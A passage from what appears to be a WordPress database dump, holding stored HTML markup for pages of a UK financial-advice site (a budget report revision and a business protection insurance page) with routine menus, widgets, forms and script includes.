class=\"email\">&#13;\n						<a href=\"mailto:?subject=Budget Report 2014&amp;body=http://www.equalitywalk.org.uk/budget-report-2014/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../budget-report-2014/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7938\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"5e0447e019\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"164\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				so&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body>','Budget Report 2018','The Chancellor leapt to his feet, announced that this was a Budget for “makers, do-ers and savers” and spent 55 minutes reeling off a list of surprises ...','inherit','closed','closed','','56-revision-v1','','','2017-09-21 16:58:38','2017-09-21 16:58:38','',56,'http://www.equalitywalk.org.uk/56-revision-v1',0,'revision','',0),(302,1,'2017-09-21 16:59:30','2017-09-21 16:59:30','<body class=\"page page-id-7189 page-template-default light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v4\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"header-info\">The 2017 Budget Announcement Will Improve Pension Planning for Everyone. Make Sure You Know How? <b><a href=\"../pensions/pension-review/\">Learn More&gt;&gt;</a></b><a href=\"mailto:\"/></div>&#13;\n			</div>&#13;\n			<div class=\"alignright\">&#13;\n							</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:0px;margin-left:0px;margin-bottom:0px;\">&#13;\n				<a href=\"/\">&#13;\n					<img src=\"../wp-content/uploads/2013/06/RSR-Logo.png\" alt=\"Equity SMART\" class=\"normal_logo\"/></a>&#13;\n			</div>&#13;\n									<h3 class=\"tagline\">Call Us Now<br/><big><big><b/></big></big>&#13;\n								</h3></div>&#13;\n	</header><div id=\"small-nav\">&#13;\n		<div class=\"avada-row\">&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7671\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-7671\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-2 col-span-2 container\"><div class=\"row\"/>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-dropdown-menu\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121 fusion-dropdown-submenu\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118 fusion-dropdown-submenu\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102 fusion-dropdown-submenu\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124 fusion-dropdown-submenu\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-dropdown-menu\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108 fusion-dropdown-submenu\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114 fusion-dropdown-submenu\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115 fusion-dropdown-submenu\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143 fusion-dropdown-submenu\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146 fusion-dropdown-submenu\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-3381 fusion-dropdown-menu\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535 fusion-dropdown-submenu\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585 fusion-dropdown-submenu\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633 fusion-dropdown-submenu\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228 fusion-dropdown-submenu\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-7189 current_page_item menu-item-7243 fusion-dropdown-submenu\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a href=\"../our-blog/\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678 fusion-dropdown-submenu\"><a href=\"../resources/\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"../contact-us/\">Contact</a></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n					<!-- START REVOLUTION SLIDER 4.3.6 fixed mode -->&#13;\n&#13;\n<div id=\"rev_slider_38_1_wrapper\" class=\"rev_slider_wrapper\" style=\"margin:0px auto;background-color:#E9E9E9;padding:0px;margin-top:0px;margin-bottom:0px;height:280px;width:960px;\">&#13;\n	<div id=\"rev_slider_38_1\" class=\"rev_slider\" style=\"display:none;height:280px;width:960px;\">&#13;\n<ul><!-- SLIDE  --><li data-transition=\"fade\" data-slotamount=\"7\">&#13;\n		<!-- MAIN IMAGE -->&#13;\n		&#13;\n		<!-- LAYERS -->&#13;\n&#13;\n		<!-- LAYER NR. 1 -->&#13;\n		<div class=\"tp-caption large_text tp-fade\" data-x=\"568\" data-y=\"57\" data-speed=\"300\" data-start=\"0\" data-easing=\"easeOutExpo\" data-splitin=\"none\" data-splitout=\"none\" data-elementdelay=\"0\" data-endelementdelay=\"0\" data-endspeed=\"300\" style=\"z-index: 2; max-width: auto; max-height: auto; white-space: nowrap;\">Business Protection&#13;\n		</div>&#13;\n&#13;\n		<!-- LAYER NR. 2 -->&#13;\n		<div class=\"tp-caption small_text tp-fade\" data-x=\"570\" data-y=\"109\" data-speed=\"300\" data-start=\"500\" data-easing=\"easeOutExpo\" data-splitin=\"none\" data-splitout=\"none\" data-elementdelay=\"0\" data-endelementdelay=\"0\" data-endspeed=\"300\" style=\"z-index: 3; max-width: auto; max-height: auto; white-space: nowrap;\">Is a key person the only thing keeping<br/> your business in the black&#13;\n		</div>&#13;\n	</li>&#13;\n	<!-- SLIDE  -->&#13;\n	<li data-transition=\"fade\" data-slotamount=\"7\">&#13;\n		<!-- MAIN IMAGE -->&#13;\n		&#13;\n		<!-- LAYERS -->&#13;\n&#13;\n		<!-- LAYER NR. 1 -->&#13;\n		<div class=\"tp-caption large_text tp-fade\" data-x=\"568\" data-y=\"57\" data-speed=\"300\" data-start=\"0\" data-easing=\"easeOutExpo\" data-splitin=\"none\" data-splitout=\"none\" data-elementdelay=\"0\" data-endelementdelay=\"0\" data-endspeed=\"300\" style=\"z-index: 2; max-width: auto; max-height: auto; white-space: nowrap;\">Business Protection&#13;\n		</div>&#13;\n&#13;\n		<!-- LAYER NR. 2 -->&#13;\n		<div class=\"tp-caption small_text tp-fade\" data-x=\"570\" data-y=\"109\" data-speed=\"300\" data-start=\"500\" data-easing=\"easeOutExpo\" data-splitin=\"none\" data-splitout=\"none\" data-elementdelay=\"0\" data-endelementdelay=\"0\" data-endspeed=\"300\" style=\"z-index: 3; max-width: auto; max-height: auto; white-space: nowrap;\">Is a key person the only thing keeping<br/> your business in the black&#13;\n		</div>&#13;\n	</li>&#13;\n</ul><div class=\"tp-bannertimer\"/>	</div>&#13;\n</div>			&#13;\n			<script type=\"text/javascript\"><![CDATA[\r\n\r\n				var tpj=jQuery;				\r\n				tpj.noConflict();				\r\n				var revapi38;\r\n				\r\n				tpj(document).ready(function() {\r\n								\r\n				if(tpj(\'#rev_slider_38_1\').revolution == undefined)\r\n					revslider_showDoubleJqueryError(\'#rev_slider_38_1\');\r\n				else\r\n				   revapi38 = tpj(\'#rev_slider_38_1\').show().revolution(\r\n					{\r\n						dottedOverlay:\"none\",\r\n						delay:9000,\r\n						startwidth:960,\r\n						startheight:280,\r\n						hideThumbs:200,\r\n						\r\n						thumbWidth:100,\r\n						thumbHeight:50,\r\n						thumbAmount:1,\r\n						\r\n						navigationType:\"bullet\",\r\n						navigationArrows:\"solo\",\r\n						navigationStyle:\"round\",\r\n						\r\n						touchenabled:\"on\",\r\n						onHoverStop:\"on\",\r\n						\r\n						swipe_velocity: 0.7,\r\n						swipe_min_touches: 1,\r\n						swipe_max_touches: 1,\r\n						drag_block_vertical: false,\r\n												\r\n						keyboardNavigation:\"off\",\r\n						\r\n						navigationHAlign:\"center\",\r\n						navigationVAlign:\"bottom\",\r\n						navigationHOffset:0,\r\n						